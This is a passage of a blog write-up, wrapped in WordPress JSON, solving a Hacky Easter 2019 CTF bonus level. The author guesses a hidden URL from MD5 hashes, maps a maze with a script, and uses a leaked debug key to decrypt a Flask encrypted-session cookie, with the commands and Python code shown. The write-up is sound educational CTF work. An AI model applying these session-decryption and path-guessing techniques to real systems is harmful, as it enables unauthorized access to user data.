width=\"400\"\/><\/td><\/tr><\/table>\n<br\/>suggests that the bonus level is an extra level of <code>The Hunt<\/code>.\n<br\/>\n<br\/>The website of the challenges contains a link to give feedback, and the feedback form contains a disabled radio button called <code>Orbit - upcomming!<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_04.png\" width=\"1000\"\/>\n<br\/>\n<br\/>When sending feedback, the parameters are passed via GET:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_05.png\" width=\"1000\"\/>\n<br\/>\n<br\/>By adjusting the <code>path<\/code> parameter to <code>3<\/code> manually, the following notification is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_06.png\" width=\"1000\"\/>\n<br\/>\n<br\/>This suggests that we have to determine how the links for path 1 and path 2 are built in order to deduce the link for path 3.\n<br\/>\n<br\/>The links for path 1 and path 2 seem to be differentiated only by an md5 checksum:\n<br\/>\n<br\/><code>http:\/\/whale.hacking-lab.com:5337\/1804161a0dabfdcd26f7370136e0f766<\/code>\n<br\/><code>http:\/\/whale.hacking-lab.com:5337\/7fde33818c41a1089088aa35b301afd9<\/code>\n<br\/>\n<br\/>These md5 checksums can actually be cracked and turn out to be <code>P4TH1<\/code> and <code>P4TH2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH1&#039; | md5sum\n1804161a0dabfdcd26f7370136e0f766  -\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH2&#039; | md5sum\n7fde33818c41a1089088aa35b301afd9  -\n<\/pre><\/div>\n<br\/>Accordingly, the link for path 3 can 
be built by calculating the md5 checksum of <code>P4TH3<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# echo -n &#039;P4TH3&#039; | md5sum\nbf42fa858de6db17c6daa54c4d912230  -\n<\/pre><\/div>\n<br\/>By browsing to the link <code>http:\/\/whale.hacking-lab.com:5337\/bf42fa858de6db17c6daa54c4d912230<\/code>, we can access the hidden bonus level:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_07.png\" width=\"1000\"\/>\n<br\/>\n<br\/>After entering the flags from <a href=\"#chlg21\">egg21<\/a> (<code>he19-zKZr-YqJO-4OWb-auss<\/code>) and <a href=\"#chlg22\">egg22<\/a> (<code>he19-JfsM-ywiw-mSxE-yfYa<\/code>), we get to the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_08.png\" width=\"800\"\/>\n<br\/>\n<br\/>Moving around a little bit, just like in the other paths, shows the usual <code>Ouch! 
You would hit a wall.<\/code> notification:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_10.png\" width=\"800\"\/>\n<br\/>\n<br\/>However, there is also a new notification:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_09.png\" width=\"800\"\/>\n<br\/>\n<br\/>The notification <code>You are not god, you can't leave the area.<\/code> suggests that there are not only walls but also a limited area in which we can move.\n<br\/>\n<br\/>Thus we can slightly adjust the script from <a href=\"#chlg21\">egg21<\/a> to handle this message as well:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\n  elif (&#039;You are not god&#039; in resp):\n    # mark the cell we tried to move to as outside the allowed area\n    field&#x5B;curp&#x5B;0]+dtc&#x5B;0]]&#x5B;curp&#x5B;1]+dtc&#x5B;1]] = &#039;O&#039;\n\n<\/pre><\/div>\n<br\/>&#8230; and use the script to expose the map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_11.png\" width=\"500\"\/>\n<br\/>\n<br\/>Moving to the task, we get the following output:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_12.png\" width=\"700\"\/>\n<br\/>\n<br\/>According to the last line of the output, the flag has been added to the session data (<code>[DEBUG]: Flag added to session<\/code>). The first line actually outputs the secret session key, which is used to encrypt the session cookie stored on the client side (<code>[DEBUG]: app.crypto_key: ...<\/code>). The output contains four squares, which replace non-printable characters. 
There is possibly an easier way to figure out what those characters actually are from within the browser, but I simply used <code>Wireshark<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_13.png\" width=\"600\"\/>\n<br\/>\n<br\/>As we can see, the bytes are <code>0x01<\/code>, <code>0x03<\/code>, <code>0x03<\/code> and <code>0x07<\/code>.\n<br\/>\n<br\/>By googling for session encryption mechanisms employed with Python Flask, I found the following <a href=\"https:\/\/github.com\/SaintFlipper\/EncryptedSession\" target=\"_new\" rel=\"noopener noreferrer\">GitHub project called Encrypted Session<\/a>.\n<br\/>\n<br\/>According to the <a href=\"https:\/\/github.com\/SaintFlipper\/EncryptedSession\/blob\/master\/encrypted_session.py\" target=\"_new\" rel=\"noopener noreferrer\">source code<\/a>, the session data is encrypted using the secret key and <code>AES<\/code> with <code>AES.MODE_EAX<\/code>. The session data contains three parts separated by dots:\n<br\/>\n<br\/><code>u.<u>CIPHER_TEXT<\/u>.<u>MAC<\/u>.<u>NONCE<\/u><\/code>\n<br\/>\n<br\/>I wasted a lot of time trying to figure out how the key (<code>\"timeto\\x01guess\\x03a\\x03last\\x07time\"<\/code> = 24 bytes) could possibly be expanded to a 32-byte key. Actually, no modification to the key is required: when using this 24-byte key, <code>AES-192<\/code> is automatically applied. 
Knowing this, we can easily decrypt the session data:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg27# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; key = &#039;timeto\\x01guess\\x03a\\x03last\\x07time&#039;\n&gt;&gt;&gt; cipher_text = &#039;pj9OWD4xrLMii5pStYUQ28\/crfOZTnzyk5NH0YvMkGRmSFMkb1XaPdl\/WSeIbdE7xbnG...&#039;.decode(&#039;base64&#039;)\n&gt;&gt;&gt; nonce = &#039;TZSKfNiijNS4AILH2p7seA==&#039;.decode(&#039;base64&#039;)\n&gt;&gt;&gt; cipher = AES.new(key, AES.MODE_EAX, nonce)\n&gt;&gt;&gt; cipher.decrypt(cipher_text)\n&#039;{&quot;c11&quot;: {&quot;a&quot;: 1}, &quot;c12&quot;: {&quot;a&quot;: 1}, &quot;c13&quot;: {&quot;a&quot;: 1}, &quot;c14&quot;: {&quot;a&quot;: 1}, &quot;c15&quot;: {&quot;a&quot;: 1}, &quot;c16&quot;: {&quot;a&quot;: 1}, &quot;c17&quot;: {&quot;a&quot;: 1}, &quot;c18&quot;: {&quot;a&quot;: 1}, &quot;c20&quot;: {&quot;a&quot;: 1}, &quot;t01&quot;: {&quot;a&quot;: 1}, &quot;f02&quot;: {&quot;a&quot;: 1}, &quot;c01&quot;: {&quot;a&quot;: 1}, &quot;c02&quot;: {&quot;a&quot;: 1}, &quot;c03&quot;: {&quot;a&quot;: 1}, &quot;c04&quot;: {&quot;a&quot;: 1}, &quot;c06&quot;: {&quot;a&quot;: 1}, &quot;c07&quot;: {&quot;a&quot;: 1}, &quot;c08&quot;: {&quot;a&quot;: 1}, &quot;c09&quot;: {&quot;a&quot;: 1}, &quot;f01&quot;: {&quot;a&quot;: 1}, &quot;h01&quot;: {&quot;a&quot;: 1}, &quot;v&quot;: &#x5B;], &quot;h&quot;: &#x5B;], &quot;m&quot;: {}, &quot;l&quot;: 10, &quot;hidden_flag&quot;: &quot;he19-fmRW-T6Oj-uNoT-dzOm&quot;, &quot;credit&quot;: &quot;thanks for playing! 
gz opasieben &amp; ccrypto :)&quot;, &quot;x&quot;: 34, &quot;y&quot;: 1, &quot;p&quot;: 3}&#039;\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-fmRW-T6Oj-uNoT-dzOm<\/span>.\n<br\/>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[8,9,13,18,16,21,17,10,11,12,28,19],"class_list":["post-1528","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-assembly","tag-binary","tag-elf","tag-gdb","tag-hacking-lab","tag-hackyeaster","tag-misc","tag-pwn","tag-r2","tag-reversing","tag-web","tag-x64"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1528"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1528"}],"version-history":[{"count":2,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1528\/revisions"}],"predecessor-version":[{"id":1530,"href":"https:\/\/devel0pment.de\/index.php?
rest_route=\/wp\/v2\/posts\/1528\/revisions\/1530"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}